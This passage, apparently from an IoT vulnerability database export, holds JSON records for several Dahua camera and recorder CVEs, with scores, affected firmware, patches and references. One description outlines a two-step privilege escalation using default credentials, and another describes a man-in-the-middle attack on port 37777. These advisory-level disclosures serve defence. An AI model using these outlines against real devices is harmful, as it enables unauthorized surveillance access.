"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-9316",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1392",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-38226",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-117519",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-9316",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"db": "VULHUB",
"id": "VHN-117519"
},
{
"db": "VULMON",
"id": "CVE-2017-9316"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"db": "NVD",
"id": "CVE-2017-9316"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
]
},
"id": "VAR-201711-1048",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"db": "VULHUB",
"id": "VHN-117519"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38226"
}
]
},
"last_update_date": "2023-12-18T13:14:05.688000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/"
},
{
"title": "A variety of Dahua product authentication bypass vulnerability patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/111823"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-117519"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"db": "NVD",
"id": "CVE-2017-9316"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.dahuasecurity.com/annoucementsingle/security-advisory--high-risk-vulnerability-found-in-dahua-ipc-hdw4300s-and-some-ip-products_14731_231.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9316"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9316"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"db": "VULHUB",
"id": "VHN-117519"
},
{
"db": "VULMON",
"id": "CVE-2017-9316"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"db": "NVD",
"id": "CVE-2017-9316"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"db": "VULHUB",
"id": "VHN-117519"
},
{
"db": "VULMON",
"id": "CVE-2017-9316"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"db": "NVD",
"id": "CVE-2017-9316"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULHUB",
"id": "VHN-117519"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULMON",
"id": "CVE-2017-9316"
},
{
"date": "2018-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"date": "2017-11-27T17:29:00.207000",
"db": "NVD",
"id": "CVE-2017-9316"
},
{
"date": "2017-05-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38226"
},
{
"date": "2017-12-20T00:00:00",
"db": "VULHUB",
"id": "VHN-117519"
},
{
"date": "2017-12-20T00:00:00",
"db": "VULMON",
"id": "CVE-2017-9316"
},
{
"date": "2018-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011146"
},
{
"date": "2017-12-20T20:40:59.923000",
"db": "NVD",
"id": "CVE-2017-9316"
},
{
"date": "2017-11-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dahua Technology Authentication vulnerabilities in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011146"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-1392"
}
],
"trust": 0.6
}
}
VAR-201703-1043
Vulnerability from variot - Updated: 2023-12-18 13:08An issue was discovered on Dahua DHI-HCVR7216A-S3 3.210.0001.10 build 2016-06-06 devices. The Dahua DVR Protocol, which operates on TCP Port 37777, is an unencrypted, binary protocol. Performing a Man-in-the-Middle attack allows both sniffing and injections of packets, which allows creation of fully privileged new users, in addition to capture of sensitive information. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. A man-in-the-middle attack vulnerability exists in DahuaDHI-HCVR7216A-S3V3.210.0001.10build2016-06-06. Devices using the following software and firmware are affected: 3.210.0001.10 build: 2016-6-6 version of NVR firmware, 2.400.0000.28.R build 2016-3-29 version of Camera firmware, Android-based gDSS software, 1.16.1 Build Date 2017-01-19 version of SmartPSS software
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-1043",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "nvr",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0001.10"
},
{
"model": "nvr",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "3.210.0001.10 build 2016-06-06"
},
{
"model": "security dhi-hcvr7216a-s3 build",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "3.210.0001.102016-06-06"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"db": "NVD",
"id": "CVE-2017-6432"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr_firmware:3.210.0001.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr7216a-s3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6432"
}
]
},
"cve": "CVE-2017-6432",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-6432",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-02726",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-114635",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-6432",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-6432",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-02726",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201703-053",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-114635",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"db": "VULHUB",
"id": "VHN-114635"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"db": "NVD",
"id": "CVE-2017-6432"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Dahua DHI-HCVR7216A-S3 3.210.0001.10 build 2016-06-06 devices. The Dahua DVR Protocol, which operates on TCP Port 37777, is an unencrypted, binary protocol. Performing a Man-in-the-Middle attack allows both sniffing and injections of packets, which allows creation of fully privileged new users, in addition to capture of sensitive information. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. A man-in-the-middle attack vulnerability exists in DahuaDHI-HCVR7216A-S3V3.210.0001.10build2016-06-06. Devices using the following software and firmware are affected: 3.210.0001.10 build: 2016-6-6 version of NVR firmware, 2.400.0000.28.R build 2016-3-29 version of Camera firmware, Android-based gDSS software, 1.16.1 Build Date 2017-01-19 version of SmartPSS software",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6432"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"db": "VULHUB",
"id": "VHN-114635"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-6432",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002238",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201703-053",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-02726",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-114635",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"db": "VULHUB",
"id": "VHN-114635"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"db": "NVD",
"id": "CVE-2017-6432"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
]
},
"id": "VAR-201703-1043",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"db": "VULHUB",
"id": "VHN-114635"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02726"
}
]
},
"last_update_date": "2023-12-18T13:08:54.100000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "HCVR7204/7208/7216A-S3",
"trust": 0.8,
"url": "http://www1.dahuasecurity.com/th/products/hcvr720472087216a-s3-1434.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-319",
"trust": 1.1
},
{
"problemtype": "CWE-310",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114635"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"db": "NVD",
"id": "CVE-2017-6432"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://nullku7.github.io/stuff/exploit/dahua/2017/03/09/dahua-nvr-authbypass.html"
},
{
"trust": 2.3,
"url": "https://twitter.com/null_ku7/status/839814344351240193"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6432"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-6432"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"db": "VULHUB",
"id": "VHN-114635"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"db": "NVD",
"id": "CVE-2017-6432"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"db": "VULHUB",
"id": "VHN-114635"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"db": "NVD",
"id": "CVE-2017-6432"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"date": "2017-03-09T00:00:00",
"db": "VULHUB",
"id": "VHN-114635"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"date": "2017-03-09T17:59:00.150000",
"db": "NVD",
"id": "CVE-2017-6432"
},
{
"date": "2017-03-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02726"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-114635"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002238"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2017-6432"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua DHI-HCVR7216A-S3 Vulnerability to create a new user with full privileges on the device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002238"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-053"
}
],
"trust": 0.6
}
}
VAR-201703-1235
Vulnerability from variot - Updated: 2023-12-18 12:51Dahua IP Camera devices 3.200.0001.6 can be exploited via these steps: 1. Use the default low-privilege credentials to list all users via a request to a certain URI. 2. Login to the IP camera with admin credentials so as to obtain full control of the target IP camera. During exploitation, the first JSON object encountered has a "Component error: login challenge!" message. The second JSON object encountered has a result indicating a successful admin login. Dahua IP Camera Devices have vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. DahuaIPCamera is a webcam from Dahua, China. A privilege escalation and information disclosure vulnerability exists in DahuaIPCamera 3.200.0001.6. An attacker can exploit these issues to gain elevated privileges and obtain unauthorized access to the sensitive information
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-1235",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ip camera",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.200.0001.6"
},
{
"model": "ip camera",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "3.200.0001.6"
},
{
"model": "security dahua ip camera",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "3.200.0001.6"
},
{
"model": "dahua technology dahua ip camera",
"scope": "eq",
"trust": 0.3,
"vendor": "",
"version": "3.200.0001.6"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"db": "BID",
"id": "97263"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"db": "NVD",
"id": "CVE-2017-7253"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ip_camera_firmware:3.200.0001.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ip_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7253"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anonymous",
"sources": [
{
"db": "BID",
"id": "97263"
}
],
"trust": 0.3
},
"cve": "CVE-2017-7253",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-7253",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2017-04888",
